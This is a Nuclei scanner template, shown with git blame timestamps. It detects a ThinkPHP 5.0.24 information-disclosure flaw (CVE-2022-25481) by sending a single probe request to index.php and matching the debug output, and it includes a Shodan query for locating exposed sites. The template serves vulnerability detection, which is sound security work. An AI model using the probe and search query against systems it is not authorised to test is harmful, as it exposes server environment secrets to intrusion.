nuclei-templates/cves/2022/CVE-2022-25481.yaml

37 lines
895 B
YAML
Raw Normal View History

2022-11-24 16:42:41 +00:00
id: CVE-2022-25481
info:
name: ThinkPHP 5.0.24 - Information Disclosure
author: caon
severity: low
2022-11-24 18:21:41 +00:00
description: |
ThinkPHP Framework v5.0.24 was discovered to be configured without the PATHINFO parameter. This allows attackers to access all system environment parameters from index.php.
reference:
- https://github.com/Lyther/VulnDiscover/blob/master/Web/ThinkPHP_InfoLeak.md
- https://nvd.nist.gov/vuln/detail/CVE-2022-25481
metadata:
verified: true
shodan-query: title:"ThinkPHP"
2022-11-25 07:38:40 +00:00
tags: cve,cve2022,thinkphp,exposure,oss
2022-11-24 16:42:41 +00:00
requests:
- method: GET
path:
- '{{BaseURL}}/index.php?s=example'
matchers-condition: and
matchers:
- type: word
words:
- "ThinkPHP"
2022-11-24 18:21:41 +00:00
- type: word
words:
- "HttpException"
- "TRACE"
condition: or
2022-11-24 16:42:41 +00:00
- type: status
status:
- 404